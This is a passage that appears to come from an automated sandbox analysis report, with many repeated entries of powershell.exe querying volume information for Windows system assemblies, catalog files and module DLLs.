                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
